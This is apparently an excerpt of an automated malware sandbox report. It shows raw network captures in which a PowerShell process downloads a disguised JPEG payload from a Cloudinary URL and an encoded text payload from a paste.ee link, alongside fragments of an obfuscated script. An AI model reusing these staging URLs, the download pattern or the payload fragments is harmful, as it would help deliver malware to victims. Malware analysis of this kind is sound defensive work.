                                                                                                          Dec 11, 2024 11:23:02.599998951 CET672INData Raw: 00 7a 00 64 00 4c 00 53 00 50 00 66 00 4f 00 66 00 51 00 47 00 67 00 47 00 22 00 0d 00 0a 00 6e 00 70 00 69 00 57 00 47 00 69 00 5a 00 64 00 69 00 4b 00 41 00 76 00 57 00 4e 00 5a 00 20 00 3d 00 20 00 22 00 75 00 4c 00 62 00 70 00 5a 00 4b 00 55
                                                                                                          Data Ascii: zdLSPfOfQGgG"npiWGiZdiKAvWNZ = "uLbpZKUjmOckgCW"iObLGbKnzqLWGbk = "aiWqLNkUkZAUNLh"WKgcmUhzNhziicm = "LNhNLKLNfGBZv
                                                                                                          Dec 11, 2024 11:23:02.600203991 CET1236INData Raw: 00 4c 00 4c 00 63 00 68 00 6b 00 6c 00 7a 00 55 00 48 00 22 00 0d 00 0a 00 0d 00 0a 00 4f 00 6d 00 69 00 65 00 4c 00 6b 00 47 00 6b 00 5a 00 6a 00 5a 00 6b 00 54 00 6d 00 7a 00 20 00 3d 00 20 00 22 00 48 00 62 00 6c 00 62 00 4b 00 76 00 72 00 6e
                                                                                                          Data Ascii: LLchklzUH"OmieLkGkZjZkTmz = "HblbKvrnaigHzcf"WAiWPhAOzCKckiL = "ZPxfUbBufiZxbbz"TiKGtjWelGWcRPK = "pieeWPtSWUtztK
                                                                                                          Dec 11, 2024 11:23:02.600298882 CET1236INData Raw: 00 69 00 57 00 63 00 47 00 4b 00 20 00 3d 00 20 00 22 00 4f 00 6b 00 54 00 62 00 57 00 57 00 4f 00 76 00 57 00 57 00 57 00 4c 00 4c 00 42 00 78 00 22 00 0d 00 0a 00 47 00 42 00 4c 00 6c 00 50 00 4c 00 4f 00 4b 00 41 00 61 00 4e 00 4c 00 6b 00 55
                                                                                                          Data Ascii: iWcGK = "OkTbWWOvWWWLLBx"GBLlPLOKAaNLkUJ = "zUeLnUIZKrCKLNW"RiioGWzIxmOdBJk = "iKLPnUULhzUbaLa"claLccLRRSgzmZN = "j
                                                                                                          Dec 11, 2024 11:23:02.600315094 CET448INData Raw: 00 69 00 6e 00 22 00 0d 00 0a 00 68 00 47 00 57 00 52 00 76 00 5a 00 74 00 69 00 57 00 4b 00 4e 00 62 00 6d 00 68 00 63 00 20 00 3d 00 20 00 22 00 6b 00 52 00 4a 00 76 00 57 00 47 00 62 00 4c 00 6e 00 47 00 63 00 43 00 70 00 47 00 62 00 22 00 0d
                                                                                                          Data Ascii: in"hGWRvZtiWKNbmhc = "kRJvWGbLnGcCpGb"adNAiomdWWhJcAs = "KIGUWfRToKiKLfW"zhLuebWflWlGKWB = "LPNnxWiibauLSWW"laqfi
                                                                                                          Dec 11, 2024 11:23:02.719865084 CET1236INData Raw: 00 22 00 0d 00 0a 00 63 00 47 00 63 00 4c 00 65 00 6a 00 6e 00 41 00 69 00 6f 00 61 00 72 00 4e 00 6e 00 47 00 20 00 3d 00 20 00 22 00 61 00 69 00 4b 00 6f 00 57 00 63 00 4c 00 4c 00 50 00 63 00 4f 00 55 00 4f 00 4c 00 4b 00 22 00 0d 00 0a 00 0d
                                                                                                          Data Ascii: "cGcLejnAioarNnG = "aiKoWcLLPcOUOLK"AtxKqbaZOLKKKhW = "kAexzcNLBpIPuWI"mkZlWoAWWxIpiGd = "TUeKKCbcZbjkzzN"kpeil


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          0192.168.2.649710151.101.1.1374432704C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2024-12-11 10:23:09 UTC127OUTGET /dytflt61n/image/upload/v1733134947/bklpyseyeut4impw50n1.jpg HTTP/1.1
                                                                                                          Host: res.cloudinary.com
                                                                                                          Connection: Keep-Alive
                                                                                                          2024-12-11 10:23:09 UTC750INHTTP/1.1 200 OK
                                                                                                          Connection: close
                                                                                                          Content-Length: 2230233
                                                                                                          Content-Type: image/jpeg
                                                                                                          Etag: "7b9a6708dc7c92995f443d0b41dbc8d0"
                                                                                                          Last-Modified: Mon, 02 Dec 2024 10:22:29 GMT
                                                                                                          Date: Wed, 11 Dec 2024 10:23:09 GMT
                                                                                                          Strict-Transport-Security: max-age=604800
                                                                                                          Cache-Control: public, no-transform, immutable, max-age=2592000
                                                                                                          Server-Timing: cld-fastly;dur=2;cpu=1;start=2024-12-11T10:23:09.459Z;desc=hit,rtt;dur=169,content-info;desc="width=1920,height=1080,bytes=2230233,o=1,ef=(17)"
                                                                                                          Server: Cloudinary
                                                                                                          Timing-Allow-Origin: *
                                                                                                          Access-Control-Allow-Origin: *
                                                                                                          Accept-Ranges: bytes
                                                                                                          X-Content-Type-Options: nosniff
                                                                                                          Access-Control-Expose-Headers: Content-Length,ETag,Server-Timing,X-Content-Type-Options
                                                                                                          x-request-id: 6f487a4c60d72621f2efeecff85ca20a
                                                                                                          2024-12-11 10:23:09 UTC1378INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d 38 32 3c 2e 33 34 32 ff db 00 43 01 09 09 09 0c 0b 0c 18 0d 0d 18 32 21 1c 21 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 ff c0 00 11 08 04 38 07 80 03 01 22 00 02 11 01 03 11 01 ff c4 00 1c 00 00 02 03 01 01 01 01 00 00 00 00 00 00 00 00 00 03 04 01 02 05 00 06 07 08 ff c4 00 55 10 00 02 02 01 03 02 04 03 05 06 03 05 06 02 01 15 01 02 03 11 00 04 12 21 31 41 05 13 22 51 61 71 81 06 14 32 91 a1 07 23 42 b1 c1
                                                                                                          Data Ascii: JFIFC $.' ",#(7),01444'9=82<.342C2!!222222222222222222222222222222222222222222222222228"U!1A"Qaq2#B
                                                                                                          2024-12-11 10:23:09 UTC1378INData Raw: 77 24 91 80 f7 ed aa 38 13 c5 74 2e 92 f9 a4 19 c0 50 c1 95 13 cc f4 aa d7 4f e2 f4 f6 cf 9a 34 12 6a 34 d1 ac 34 c0 35 95 3d b3 e9 ff 00 b5 df 0d 9e 5f 16 d1 c2 37 3c 8c ae 62 55 46 b2 4b 70 2d 85 9e 48 cf 03 04 29 1a 02 c8 cb 27 e1 22 e8 8f 87 f3 c0 63 45 08 87 48 b1 94 0b b9 a8 91 99 9a b8 22 87 5d 10 0c cd 1b b7 a8 92 00 02 e8 d6 6a e9 8a 5b 07 65 52 c0 a8 46 37 fa 62 5a 9d 3c 47 59 18 29 b4 1d c3 d2 47 3f 4c 09 9f 4f a7 74 d3 90 78 2c c0 37 bf 3c 73 8a 10 92 a8 46 da b2 2c 8a a8 77 71 9b 83 4e 8f 0a 82 ab ed c1 ac ce 7f 04 8d 35 22 50 e5 08 6b aa b1 81 68 b5 2c ec eb e5 80 55 14 32 31 a5 53 75 63 e7 97 d6 cd 1e a2 6d 36 91 ee de 4f 55 76 14 79 07 0b 2b 22 ef 72 88 c0 2f a9 8a 8e 6b 31 f4 8c da ed 7c d2 10 5c 85 3b 2c d5 0a 23 a6 06 b8 8b 6f 90 b0 bc
                                                                                                          Data Ascii: w$8t.PO4j445=_7<bUFKp-H)'"cEH"]j[eRF7bZ<GY)G?LOtx,7<sF,wqN5"Pkh,U21Sucm6OUvy+"r/k1|\;,#o
                                                                                                          2024-12-11 10:23:09 UTC1378INData Raw: 8c cd 80 06 22 88 00 fb 74 c5 c6 89 f4 fe 2d 26 ab ef 2f e5 b0 1e 8a 15 d3 03 7b ef a3 82 6d 4f 7c 20 f1 02 0b 6d 76 25 85 73 99 62 5f 34 d8 1c 7b e1 83 10 a3 8a b3 d7 01 8d 66 a0 49 0c 6a 5b 68 dc c7 75 e1 74 7a 92 cc 1f 71 de be 96 e6 f7 0f 7c c8 f1 3d 3b 6a 61 8e 38 e5 68 88 53 ea 51 cd e4 69 8b 69 b6 02 ec e5 68 59 ea 78 eb 81 ea 25 9c b2 90 2b 69 19 91 39 68 a6 8e 4d 96 a1 83 30 63 c6 30 9a 85 d8 ac 59 55 5b 81 67 92 71 2f 14 95 e6 85 a2 86 89 65 2a 6b b5 e0 6a 45 e2 ed 26 a4 45 1f aa 31 d4 a9 e0 1f 6c cd 97 c4 4b c9 2b 9e 77 31 20 fd 71 4d 32 2f 84 e8 00 6d cc e7 80 7b 9f 8e 27 14 ca fc 0f c3 cf 24 60 3a 67 91 e4 34 0b 1a be b9 07 54 77 8b e0 11 ef df 04 93 a2 2b 51 f5 1e 2b e1 99 7a 9d 2e ac 78 92 ce 35 2d f7 72 2b cb a1 5f 3c 0d 4d 46 b0 24 43 7b
                                                                                                          Data Ascii: "t-&/{mO| mv%sb_4{fIj[hutzq|=;ja8hSQiihYx%+i9hM0c0YU[gq/e*kjE&E1lK+w1 qM2/m{'$`:g4Tw+Q+z.x5-r+_<MF$C{
                                                                                                          2024-12-11 10:23:09 UTC1378INData Raw: 66 6d 4b f8 66 a7 61 05 96 26 b5 23 f1 70 73 f3 be ae 35 fb ac f2 15 01 99 ef 9e a3 9e d9 f5 ef 18 fb 5d a0 0b 26 92 09 a3 77 64 65 26 fe 07 fe bf ae 7c 9f 57 2c 6f e1 f2 21 70 ae ac 0d 7b e0 62 6c 20 6e 07 80 31 dd 33 bb 44 39 b3 7c 83 8a 79 8d b8 86 e0 1e 31 9d 15 14 65 07 a6 03 88 18 2d 95 5e 72 e2 32 ca 6d 45 1c ac a8 16 35 3b e8 8c a9 d4 24 41 44 8e 59 8f 4e 0e 01 3c b5 58 f6 8b 5a 3c 57 4c 80 be e2 fe 63 38 92 e0 90 f4 3a d6 5c be c4 0e ce 02 81 f9 e0 42 26 e0 56 94 1f 6c 23 82 aa 2d 54 0d c4 8f 8e 29 06 b5 25 76 51 e8 3d af be 32 1d 5c 6d 2c 09 1d f0 0f 13 72 3a 7d 71 b5 72 07 52 7e 03 33 d0 d6 da 3c f7 c6 44 6b d2 46 56 37 55 7d 0e 01 0c 8f 24 8a 63 ba f6 03 bf b6 3a 74 d3 3c 51 3c 60 33 49 b7 d3 e9 0c 2f a1 da 1b 77 36 39 34 39 1e f9 5d 14 f0 e9
                                                                                                          Data Ascii: fmKfa&#ps5]&wde&|W,o!p{bl n13D9|y1e-^r2mE5;$ADYN<XZ<WLc8:\B&Vl#-T)%vQ=2\m,r:}qrR~3<DkFV7U}$c:t<Q<`3I/w6949]
                                                                                                          2024-12-11 10:23:09 UTC1378INData Raw: 02 f2 41 e0 62 ed a9 02 44 70 8a c0 0b 66 63 c8 f9 65 03 79 a4 21 b2 3a 71 db 03 2e c8 9c 24 7b 9a fa fc 06 07 ba 3a c5 79 3c b6 3b 59 7b 91 f8 be 58 b6 b4 02 37 6d e7 bf c7 25 cd 2d 06 2c 3f 17 06 b1 43 36 d6 28 cc d4 dc 82 47 4f ae 00 1d 03 03 e9 c0 ec 01 b6 ed e9 8e 05 3b 6a ab db e3 95 f2 8b 03 5c 0e f8 0b 30 55 21 42 96 63 d1 47 7c 22 e8 dc 95 79 9d ae ec 20 6e 07 cf 0e a8 ab ca a5 03 d0 e5 e2 47 67 a2 2e b0 07 20 26 43 e9 ed c7 1f d7 2a 51 c2 9b 5e b8 47 23 71 04 51 ca 16 24 71 80 22 18 70 16 b2 e8 8c 48 39 60 bc d0 be 7a d6 6a 78 57 86 2e b9 a5 56 b5 0a bf 89 7a 86 c0 48 0f 49 17 47 2b b5 98 10 1b 93 c0 cf 56 3c 0f 47 c3 04 90 81 41 bd 46 c9 ae bc 63 71 e8 74 b1 a8 03 4d 18 ae fb 45 fe 67 03 c2 18 66 d3 b5 14 60 4f 3e ae f9 74 0c ec 41 5c f7 6f a7
                                                                                                          Data Ascii: AbDpfcey!:q.${:y<;Y{X7m%-,?C6(GO;j\0U!BcG|"y nGg. &C*Q^G#qQ$q"pH9`zjxW.VzHIG+V<GAFcqtMEgf`O>tA\o
                                                                                                          2024-12-11 10:23:09 UTC1378INData Raw: f1 15 94 48 14 8d b6 ca df a7 03 e9 f1 cc df b0 9a 89 a3 d3 7d a7 48 0c aa 4f 84 33 7a 05 9a 12 c4 39 ae db 49 07 e1 78 6f b5 a3 56 df b4 cd 42 6a db 6c ad a8 85 db 71 e8 19 51 81 f8 0a 38 1e fb ed 9c ba 65 d2 cd f6 82 49 4c da 88 d8 68 f4 fb a3 2c b1 f9 91 ee 2f 67 f1 10 a1 80 1d 8b 03 db 3e 6f a5 7d 2b 49 12 ef 8d 83 7e 0e 3a 8a 24 9e 9c 1f 7f 9e 7b 5f da 44 2f a0 f0 ff 00 0d 48 24 46 1a ad 05 36 c4 5a 71 4a 40 aa e7 9a e7 3e 65 f7 7d 42 08 d6 35 7a f2 dd 94 dd 6d 62 bd 30 35 27 d2 46 65 8a 40 54 aa 93 60 8b fd 30 5e 46 98 ea 15 46 9d 41 55 2d c8 a1 f9 74 c4 92 09 9f 4c c3 d4 a4 44 a1 94 25 7a 87 23 a9 e4 f1 97 58 35 0d 34 6e c8 f4 ec 25 2c 79 da 45 d0 fc ab 03 61 20 d3 6d dd b1 16 bd 94 56 56 5d 3e 92 65 37 1a 5d 75 0b 99 9a 6d 43 a4 c1 0e 9a c9 dc 4b
                                                                                                          Data Ascii: H}HO3z9IxoVBjlqQ8eILh,/g>o}+I~:${_D/H$F6ZqJ@>e}B5zmb05'Fe@T`0^FFAU-tLD%z#X54n%,yEa mVV]>e7]umCK
                                                                                                          2024-12-11 10:23:09 UTC1378INData Raw: 0f 38 48 fe dc e9 54 9b 82 4d fd 58 12 28 e7 cf e7 79 21 87 cc 2e ca e0 72 a8 2f 13 89 e4 d5 5b c6 ee 48 fc 4a c2 b0 3d e6 a7 ed f6 98 ea 3f 79 a6 90 83 de c0 c9 3f 6c 74 82 88 d3 b8 53 ec dc e7 cf a5 47 2d be 6b bb a0 06 3f 04 cd 0a 82 f0 2c 8a dc 0d d8 1e b9 be da e9 18 d7 95 29 3d bd 57 94 7f b7 3a 54 50 7e eb 2b 3d 55 93 9e 6a 2d 56 9b 54 ac 53 49 12 95 34 48 26 ef 17 95 d7 cc 56 11 2f c4 73 c6 07 a8 9b ed f6 8a 14 2c 74 ce 1a ba 6e ac cb f0 9f b5 be 11 e1 d3 4b 20 4d 43 bc c7 73 6e 6b 0a 7d 80 ac cd 30 69 b5 3e 96 d2 a3 12 3f 10 ea 33 16 5f 04 d4 0d 63 46 8b 69 d4 37 41 81 bf e3 9f 6c e5 d4 f8 a4 53 78 74 af 0c 51 0d db 4d 90 cd ec 46 7a 78 be de e8 bc a5 59 f4 ec d2 6c 05 88 60 05 9f 60 73 c1 41 e0 b1 23 7e f8 b3 f1 cf 6a 39 a9 f7 7d 24 6a 0b a0 07
                                                                                                          Data Ascii: 8HTMX(y!.r/[HJ=?y?ltSG-k?,)=W:TP~+=Uj-VTSI4H&V/s,tnK MCsnk}0i>?3_cFi7AlSxtQMFzxYl``sA#~j9}$j
                                                                                                          2024-12-11 10:23:09 UTC1378INData Raw: 93 c3 b9 dc ee 49 76 31 34 6a b8 dc 05 11 d7 8b bc 70 f8 b6 92 49 de 46 2e 1e 55 62 e4 a2 90 58 83 c9 1d f8 24 59 b3 de f3 0e 69 7c cd a2 ec 2a 95 51 55 42 c9 fa f5 38 17 95 15 a4 31 a2 aa b2 83 6b 1d 91 c5 d9 b2 7d b2 da 77 31 22 d4 65 b7 b1 50 7d c8 af ee 30 63 51 21 05 4b 02 0d d9 2a 09 e7 ad 1a b1 91 1c 92 aa 00 ad 41 4e e0 3d 8f 1f db 01 89 35 3b c0 20 15 db de f0 6f a9 56 75 76 dc 48 ed bb 8c 08 5b 4a 17 7d f9 ca 88 49 e2 f9 18 1a 03 c4 23 6b 26 3e a2 b2 24 d6 c3 22 14 64 b1 ef ed 88 84 29 76 39 ca bd 12 08 bf cb 00 a4 c2 14 98 d5 83 0e 84 9c 9d 36 a5 e0 63 42 c9 e7 9c 18 e0 82 47 07 2c 14 16 14 d5 f0 ac 0d 24 f1 5d a4 03 18 2f ee 33 6b 47 ad d3 3e 98 4d 26 91 19 99 d9 77 32 b9 ae 9e a2 43 00 33 ca 86 52 de ae 08 03 9c 29 21 94 85 5e 2a b8 e3 eb d7
                                                                                                          Data Ascii: Iv14jpIF.UbX$Yi|*QUB81k}w1"eP}0cQ!K*AN=5; oVuvH[J}I#k&>$"d)v96cBG,$]/3kG>M&w2C3R)!^*
                                                                                                          2024-12-11 10:23:09 UTC1378INData Raw: 55 78 17 d8 df cf 2b 2c 4e 80 47 2a b5 05 dd 83 d3 29 55 65 55 65 1b 88 c0 d0 66 49 22 dc ae c1 81 be 17 8e 98 b8 77 8c 15 90 2d 6e ea 32 88 5e 32 40 1b ab 2a 25 32 69 64 0c c3 75 1f cc 74 c0 b4 00 44 43 48 3d 24 9e be d9 57 87 73 82 09 b3 d6 b1 53 aa 77 34 e4 5d 03 47 e5 93 f7 c4 14 49 da 40 2a 7e 3f 96 07 ad 79 e3 61 bd 4e d0 7b e4 95 8a 45 b0 c5 8f c3 02 ba 33 cb 53 00 3b 9c 80 42 b1 3b b9 f9 60 18 ce aa 42 b2 86 1d 2c 76 f9 e3 0e ab 40 03 c5 70 31 00 f6 a4 48 6a fa 1d b8 cc 2f e7 00 a5 a9 94 58 f8 8c 0e 24 5d 61 13 77 6b 03 e1 92 17 af 1f 8b 8b c9 29 b5 49 1f 2c 00 18 b9 2d 6c 4f c7 28 47 15 75 86 08 42 f2 6b 2a c9 e9 3e bc 08 42 03 02 af 44 f7 ba cd 6f 04 d6 47 a2 d4 4a f3 be d5 70 2b 82 6d be 99 8e 14 03 f8 ac e1 01 2b d3 ad 7b d6 07 a4 f1 bd 8b 0a
                                                                                                          Data Ascii: Ux+,NG*)UeUefI"w-n2^2@*%2idutDCH=$WsSw4]GI@*~?yaN{E3S;B;`B,v@p1Hj/X$]awk)I,-lO(GuBk*>BDoGJp+m+{
                                                                                                          2024-12-11 10:23:09 UTC1378INData Raw: 20 86 62 6f b7 53 95 e9 c1 c0 bc 8f be be 19 5d c4 8a ed 90 7e 1d 32 39 c0 90 48 37 9c 4d 9c e1 d7 9e 99 6a 5f 2e ef d5 7d 3e 18 10 8a 5d c2 8e a7 8c 69 34 c5 24 56 24 30 0d 46 b1 55 b1 ea 1d 46 31 16 a9 92 68 d9 85 aa 90 6b 01 c1 a3 1f 78 16 c0 03 ea 1c d1 c0 ea a1 47 d4 b2 c6 e2 c0 b3 63 fa e0 66 d4 34 f3 16 51 42 c9 03 28 ac 03 31 65 dc 4f 7f 6c 06 e7 83 7e 99 69 cb 32 f7 6e ff 00 2c 5a 39 4a c0 e9 cd 9e 38 cd 24 4f 37 40 10 47 6c 3a 1f ae 27 36 92 58 80 97 69 00 1b 35 81 30 05 58 83 ca 01 00 f7 cf b2 7e cf b4 a9 3f ec fb 47 a6 9e 36 97 4f a8 fb 42 11 94 77 56 88 29 e7 b7 cf b6 7c 6a 58 19 c8 f2 eb 6d 73 66 8f 39 fa 1b f6 20 88 bf 60 e7 77 65 21 f5 ce 36 b3 71 7b 50 00 47 c4 d0 fa e0 7c f3 ec 86 96 0d 24 df 69 61 de cc 9f 72 5f 4c 4e 18 b2 99 62 23 d4
                                                                                                          Data Ascii: boS]~29H7Mj_.}>]i4$V$0FUF1hkxGcf4QB(1eOl~i2n,Z9J8$O7@Gl:'6Xi50X~?G6OBwV)|jXmsf9 `we!6q{PG|$iar_LNb#


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          1192.168.2.649759104.21.84.674432704C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2024-12-11 10:23:29 UTC67OUTGET /r/03xCn/0 HTTP/1.1
                                                                                                          Host: paste.ee
                                                                                                          Connection: Keep-Alive
                                                                                                          2024-12-11 10:23:29 UTC1289INHTTP/1.1 200 OK
                                                                                                          Date: Wed, 11 Dec 2024 10:23:29 GMT
                                                                                                          Content-Type: text/plain; charset=utf-8
                                                                                                          Transfer-Encoding: chunked
                                                                                                          Connection: close
                                                                                                          Cache-Control: max-age=2592000
                                                                                                          strict-transport-security: max-age=63072000
                                                                                                          x-frame-options: DENY
                                                                                                          x-content-type-options: nosniff
                                                                                                          x-xss-protection: 1; mode=block
                                                                                                          content-security-policy: default-src 'self'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://cdnjs.cloudflare.com https://www.google.com https://www.gstatic.com https://analytics.paste.ee; img-src 'self' https://secure.gravatar.com https://analytics.paste.ee data:; style-src 'self' 'unsafe-inline' https://fonts.googleapis.com https://cdnjs.cloudflare.com; font-src 'self' https://themes.googleusercontent.com https://fonts.gstatic.com; frame-src https://www.google.com; object-src 'none'
                                                                                                          CF-Cache-Status: HIT
                                                                                                          Age: 101937
                                                                                                          Last-Modified: Tue, 10 Dec 2024 06:04:32 GMT
                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0ca6ACL%2B2OtQ5nLyUAkTGZLmOBNt79sLTBy9XyY9kFYWhzbp49iAY%2B8jJxj1lIuZGttjeS2Ly8y9%2FA9FX3K7IK2E0vGDA8l%2F58LwxLBMIKfHie1IWA0ZB757iQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                          Server: cloudflare
                                                                                                          CF-RAY: 8f04c2721b550f5b-EWR
                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                          2024-12-11 10:23:29 UTC215INData Raw: 73 65 72 76 65 72 2d 74 69 6d 69 6e 67 3a 20 63 66 4c 34 3b 64 65 73 63 3d 22 3f 70 72 6f 74 6f 3d 54 43 50 26 72 74 74 3d 31 34 35 35 26 6d 69 6e 5f 72 74 74 3d 31 34 34 36 26 72 74 74 5f 76 61 72 3d 35 36 31 26 73 65 6e 74 3d 35 26 72 65 63 76 3d 36 26 6c 6f 73 74 3d 30 26 72 65 74 72 61 6e 73 3d 30 26 73 65 6e 74 5f 62 79 74 65 73 3d 32 38 31 36 26 72 65 63 76 5f 62 79 74 65 73 3d 36 38 31 26 64 65 6c 69 76 65 72 79 5f 72 61 74 65 3d 31 39 31 37 32 36 38 26 63 77 6e 64 3d 32 31 38 26 75 6e 73 65 6e 74 5f 62 79 74 65 73 3d 30 26 63 69 64 3d 62 61 30 32 63 37 65 35 30 65 64 65 34 62 33 32 26 74 73 3d 34 35 30 26 78 3d 30 22 0d 0a 0d 0a
                                                                                                          Data Ascii: server-timing: cfL4;desc="?proto=TCP&rtt=1455&min_rtt=1446&rtt_var=561&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2816&recv_bytes=681&delivery_rate=1917268&cwnd=218&unsent_bytes=0&cid=ba02c7e50ede4b32&ts=450&x=0"
                                                                                                          2024-12-11 10:23:29 UTC1234INData Raw: 37 61 39 31 0d 0a 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 50 34 7a 44 32 38 77 4c 50 63 79 44 66 38 67 46 50 4d 78 44 4c 38 41 77 4f 6b 76 44 78 37 51 36 4f 41 75 44 59 37 77 7a 4f 63 6f 44 38 36 77 73 4f 73 71 44 6a 36 77 6d 4f 45 70 44 4b 36 41 68 4f 49 6f 44 42 36 41 51 4f 38 6e 44 2b 35 51 66 4f 67 4f 44 4e 7a
                                                                                                          Data Ascii: 7a91AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAP4zD28wLPcyDf8gFPMxDL8AwOkvDx7Q6OAuDY7wzOcoD86wsOsqDj6wmOEpDK6AhOIoDB6AQO8nD+5QfOgODNz
                                                                                                          2024-12-11 10:23:29 UTC1369INData Raw: 6b 67 44 46 33 77 2f 4e 30 66 44 38 33 77 2b 4e 6f 66 44 32 33 51 39 4e 45 66 44 72 33 51 36 4e 67 65 44 6e 33 67 35 4e 49 65 44 68 33 51 33 4e 63 64 44 56 33 41 31 4e 4d 64 44 50 33 67 7a 4e 6f 63 44 45 33 67 77 4e 45 63 44 41 32 77 76 4e 73 62 44 36 32 67 74 4e 41 62 44 75 32 51 72 4e 77 61 44 6f 32 77 70 4e 4d 61 44 64 32 77 6d 4e 6f 5a 44 57 32 51 6c 4e 45 5a 44 4c 32 51 69 4e 67 59 44 45 32 77 51 4e 30 58 44 38 31 77 65 4e 6f 58 44 6b 31 67 59 4e 45 43 41 41 42 51 47 41 47 41 4d 41 41 41 77 4f 6f 74 44 5a 77 41 44 41 41 41 41 45 41 59 41 73 41 73 44 4d 37 67 69 4f 55 72 44 30 36 77 73 4f 59 71 44 65 36 77 6c 4f 38 6f 44 4f 36 67 69 4f 51 6b 44 32 35 67 63 4f 73 6d 44 71 35 67 59 4f 45 6d 44 67 35 77 48 41 41 41 41 4d 41 59 41 67 41 67 44 67 34 77 48
                                                                                                          Data Ascii: kgDF3w/N0fD83w+NofD23Q9NEfDr3Q6NgeDn3g5NIeDh3Q3NcdDV3A1NMdDP3gzNocDE3gwNEcDA2wvNsbD62gtNAbDu2QrNwaDo2wpNMaDd2wmNoZDW2QlNEZDL2QiNgYDE2wQN0XD81weNoXDk1gYNECAABQGAGAMAAAwOotDZwADAAAAEAYAsAsDM7giOUrD06wsOYqDe6wlO8oDO6giOQkD25gcOsmDq5gYOEmDg5wHAAAAMAYAgAgDg4wH
                                                                                                          2024-12-11 10:23:29 UTC1369INData Raw: 72 44 76 36 51 72 4f 73 71 44 70 36 77 70 4f 55 71 44 6a 36 51 6f 4f 38 70 44 64 36 77 6d 4f 6b 70 44 58 36 51 6c 4f 4d 70 44 52 36 77 6a 4f 30 6f 44 4c 36 51 69 4f 63 6f 44 46 36 77 67 4f 45 6b 44 2f 35 51 66 4f 73 6e 44 35 35 77 64 4f 55 6e 44 7a 35 51 63 4f 38 6d 44 74 35 77 61 4f 6b 6d 44 6e 35 51 5a 4f 4d 6d 44 68 35 77 58 4f 30 6c 44 62 35 51 57 4f 63 6c 44 56 35 77 55 4f 45 6c 44 50 35 51 54 4f 73 6b 44 4a 35 77 52 4f 55 6b 44 44 35 51 41 4f 38 6a 44 39 34 77 4f 4f 6b 6a 44 33 34 51 4e 4f 4d 6a 44 78 34 77 4c 4f 30 69 44 72 34 51 4b 4f 63 69 44 6c 34 77 49 4f 45 69 44 66 34 51 48 4f 73 68 44 5a 34 77 46 4f 55 68 44 54 34 51 45 4f 38 67 44 4e 34 77 43 4f 6b 67 44 48 34 51 42 4f 4d 67 44 42 33 77 2f 4e 30 66 44 37 33 51 2b 4e 63 66 44 31 33 77 38 4e
                                                                                                          Data Ascii: rDv6QrOsqDp6wpOUqDj6QoO8pDd6wmOkpDX6QlOMpDR6wjO0oDL6QiOcoDF6wgOEkD/5QfOsnD55wdOUnDz5QcO8mDt5waOkmDn5QZOMmDh5wXO0lDb5QWOclDV5wUOElDP5QTOskDJ5wROUkDD5QAO8jD94wOOkjD34QNOMjDx4wLO0iDr4QKOciDl4wIOEiDf4QHOshDZ4wFOUhDT4QEO8gDN4wCOkgDH4QBOMgDB3w/N0fD73Q+NcfD13w8N
                                                                                                          2024-12-11 10:23:29 UTC1369INData Raw: 44 34 31 67 64 4e 51 58 44 79 31 41 63 4e 34 57 44 73 31 67 61 4e 67 57 44 6d 31 41 5a 4e 49 57 44 67 31 67 58 4e 77 56 44 61 31 41 57 4e 59 56 44 55 31 67 55 4e 41 56 44 4f 31 41 54 4e 6f 55 44 49 31 67 52 4e 51 55 44 43 31 41 41 4e 34 54 44 38 30 67 4f 4e 67 54 44 32 30 41 4e 4e 49 54 44 77 30 67 4c 4e 77 53 44 71 30 41 4b 4e 59 53 44 6b 30 67 49 4e 41 53 44 65 30 41 48 4e 6f 52 44 59 30 67 46 4e 51 52 44 53 30 41 45 4e 34 51 44 4d 30 67 43 4e 67 51 44 47 30 41 42 4e 49 51 44 41 7a 67 2f 4d 77 50 44 36 7a 41 2b 4d 59 50 44 30 7a 67 38 4d 41 50 44 75 7a 41 37 4d 6f 4f 44 6f 7a 67 35 4d 51 4f 44 69 7a 41 34 4d 34 4e 44 63 7a 67 32 4d 67 4e 44 57 7a 41 31 4d 49 4e 44 51 7a 67 7a 4d 77 4d 44 4b 7a 41 79 4d 59 4d 44 45 7a 67 77 4d 41 49 44 2b 79 41 76 4d 6f
